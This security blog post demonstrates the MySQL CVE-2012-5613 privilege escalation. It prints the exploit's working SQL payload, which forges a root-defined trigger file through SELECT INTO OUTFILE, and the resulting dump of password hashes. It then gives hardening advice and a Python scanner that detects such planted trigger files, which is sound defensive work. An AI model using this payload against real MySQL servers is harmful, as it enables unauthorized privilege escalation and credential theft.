The MySQL Month

The month is not over yet, but with the end of the world approaching, we may safely say that this month is the month of MySQL bugs (or features).

Kingcope published seven MySQL vulnerabilities in the first weekend of December, which made quite a buzz in the security community.

In this post we will demonstrate the CVE-2012-5613 exploit. The exploit needs a low-privileged MySQL account that holds the FILE privilege (and nothing else beyond rights on its own database; in particular, no access to the mysql system tables). We will test against localhost, but it works equally well against a remote server.

First, we will create the user, the table and grant the necessary privileges:

~# mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 34
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> CREATE USER 'test'@'localhost' IDENTIFIED BY 'test';
Query OK, 0 rows affected (0.00 sec)
mysql> create database testdb;
Query OK, 1 row affected (0.00 sec)
mysql> GRANT ALL PRIVILEGES ON testdb.* TO 'test'@'localhost' WITH GRANT OPTION;
Query OK, 0 rows affected (0.00 sec)
mysql> GRANT FILE ON *.* TO 'test'@'localhost' WITH GRANT OPTION;
Query OK, 0 rows affected (0.00 sec)
mysql> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.00 sec)
mysql> Bye

We confirm that the user cannot read the password hashes in mysql.user:

~# mysql -utest -ptest
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> select * from mysql.user;
ERROR 1142 (42000): SELECT command denied to user 'test'@'localhost' for table 'user'
mysql> Bye

Finally, we run the exploit script:

~# perl mysql.pl 
select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/testdb/rootme.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on rootme for each row\\nbegin \\nUPDATE mysql.user SET Select_priv=\\\'Y\\\', Insert_priv=\\\'Y\\\', Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_priv=\\\'Y\\\', Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\\', Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\', References_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\', Show_db_priv=\\\'Y\\\', Super_priv=\\\'Y\\\', Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\\'Y\\\', Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\', Repl_client_priv=\\\'Y\\\', Create_view_priv=\\\'Y\\\', Show_view_priv=\\\'Y\\\', Create_routine_priv=\\\'Y\\\', Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\', Event_priv=\\\'Y\\\', Trigger_priv=\\\'Y\\\', ssl_type=\\\'Y\\\', ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\', max_questions=\\\'Y\\\', max_updates=\\\'Y\\\', max_connections=\\\'Y\\\' WHERE User=\\\'test\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';
DBD::mysql::db do failed: Unknown table 'rootme' at mysql.pl line 136.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql.pl line 142.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql.pl line 151.
W00TW00T!
Found a row: id = root, name = *9CFBBC772F3F6C106020035386DA5BBBF1249A11
Found a row: id = root, name = *9CFBBC772F3F6C106020035386DA5BBBF1249A11
Found a row: id = root, name = *9CFBBC772F3F6C106020035386DA5BBBF1249A11
Found a row: id = debian-sys-maint, name = *BDA9386EE35F7F326239844C185B01E3912749BF
Found a row: id = test, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = rootedbox2, name = *2E336F463947F204B63500637846D6AC2A4D26BA
Found a row: id = user, name = *14E65567ABDB5135D0CFD9A70B3032C179A49EE7

Now, many are saying that the FILE privilege should not be granted lightly... and they are correct. You will rarely see a server on which regular users hold the FILE privilege, and that does not make the published exploits any less cool :-). But hopefully some administrators will now understand what the privilege really buys an attacker: SELECT ... INTO OUTFILE can write a trigger definition file (rootme.TRG above) straight into the data directory, the trigger's DEFINER is whatever the file says (here root@localhost), and when the trigger fires its body runs with that account's rights, which is enough to rewrite the attacker's own row in mysql.user. Two checks worth doing after reading this: audit which accounts have File_priv set in mysql.user, and point secure_file_priv at a directory outside the data directory so that INTO OUTFILE cannot drop files where the server loads them from.
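For the defensive side of the same story, here is an added example (not code from this post, nor from the exploit it runs): a small Python scanner that walks a MySQL data directory, parses every .TRG file and flags triggers whose DEFINER is a privileged account and whose body writes to the mysql system tables, which is exactly what the rootme.TRG planted above looks like on disk. The file layout (a TYPE=TRIGGERS header followed by key=value lines whose quoted values use \', \n and \\ escapes) is read off the script output above and is an assumption, as is the list of accounts treated as privileged; both sample files are constructed for the example.

```python
"""Flag .TRG trigger files that run as a privileged definer and write to mysql.*.
Added example, not the post's or the exploit's code. The .TRG layout and its
escape set are assumptions taken from the rootme.TRG output shown above."""
import os
import re
import tempfile

# Constructed sample modelled on the rootme.TRG contents printed by the script.
MALICIOUS_TRG = (
    "TYPE=TRIGGERS\n"
    "triggers='CREATE DEFINER=`root`@`localhost` trigger atk after insert on "
    "rootme for each row\\nbegin \\nUPDATE mysql.user SET Super_priv=\\'Y\\', "
    "File_priv=\\'Y\\' WHERE User=\\'test\\';\\nend'\n"
    "sql_modes=0\n"
    "definers='root@localhost'\n"
    "client_cs_names='latin1'\n"
    "connection_cl_names='latin1_swedish_ci'\n"
    "db_cl_names='latin1_swedish_ci'\n"
)

# Constructed sample of an ordinary audit-log trigger, for comparison.
BENIGN_TRG = (
    "TYPE=TRIGGERS\n"
    "triggers='CREATE DEFINER=`app`@`localhost` trigger log_ins after insert on "
    "orders for each row\\nbegin \\nINSERT INTO orders_log(order_id) VALUES "
    "(NEW.id);\\nend'\n"
    "sql_modes=0\n"
    "definers='app@localhost'\n"
)

# Assumption: accounts a trigger definer should never be without someone noticing.
PRIVILEGED_USERS = {"root", "debian-sys-maint"}

# A write statement aimed at any table in the mysql schema.
SYSTEM_TABLE_WRITE = re.compile(
    r"\b(UPDATE|INSERT\s+INTO|DELETE\s+FROM|REPLACE\s+INTO)\s+`?mysql`?\s*\.\s*`?\w+`?",
    re.IGNORECASE)

# Backslash escapes assumed inside quoted .TRG values.
_ESCAPES = {"n": "\n", "r": "\r", "0": "\0", "\\": "\\", "'": "'"}


def unescape(value):
    """Undo the backslash escapes used inside a quoted .TRG value."""
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            out.append(_ESCAPES.get(value[i + 1], value[i + 1]))
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def parse_trg(text):
    """Parse a .TRG file into {key: [values]}; one value per trigger per key."""
    lines = text.splitlines()
    if not lines or lines[0] != "TYPE=TRIGGERS":
        raise ValueError("not a MySQL trigger definition file")
    fields = {}
    for line in lines[1:]:
        key, _, raw = line.partition("=")
        if len(raw) >= 2 and raw[0] == "'" and raw[-1] == "'":
            raw = unescape(raw[1:-1])
        fields.setdefault(key, []).append(raw)
    return fields


def suspicious_triggers(fields):
    """Return (definer, matched statement) for each trigger that runs as a
    privileged account and writes to mysql.*; definers[] parallels triggers[]."""
    findings = []
    definers = fields.get("definers", [])
    for n, body in enumerate(fields.get("triggers", [])):
        definer = definers[n] if n < len(definers) else ""
        hit = SYSTEM_TABLE_WRITE.search(body)
        if definer.split("@", 1)[0] in PRIVILEGED_USERS and hit:
            findings.append((definer, hit.group(0)))
    return findings


def scan_datadir(datadir):
    """Walk a data directory and report every .TRG file holding a suspicious trigger."""
    results = {}
    for root, _dirs, files in os.walk(datadir):
        for name in files:
            if not name.upper().endswith(".TRG"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="latin-1") as fh:
                try:
                    fields = parse_trg(fh.read())
                except ValueError:
                    continue
            findings = suspicious_triggers(fields)
            if findings:
                results[path] = findings
    return results


def demo():
    """Build a throwaway data directory holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as datadir:
        dbdir = os.path.join(datadir, "testdb")
        os.makedirs(dbdir)
        for name, content in (("rootme.TRG", MALICIOUS_TRG), ("orders.TRG", BENIGN_TRG)):
            with open(os.path.join(dbdir, name), "w", encoding="latin-1") as fh:
                fh.write(content)
        return {os.path.basename(p): f for p, f in scan_datadir(datadir).items()}
```

Run scan_datadir against the real datadir (as a user that can read it, with mysqld's own file ownership in mind: a .TRG written by INTO OUTFILE is owned by the mysqld account like everything else there, so ownership alone does not give it away) and the only hits should be triggers a DBA can account for. The definer check matters more than the body match: a legitimate trigger rarely needs to be defined by root, and the exploit has to name a privileged definer to get anywhere.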

The post The MySQL Month appeared first on Web Security Watch.

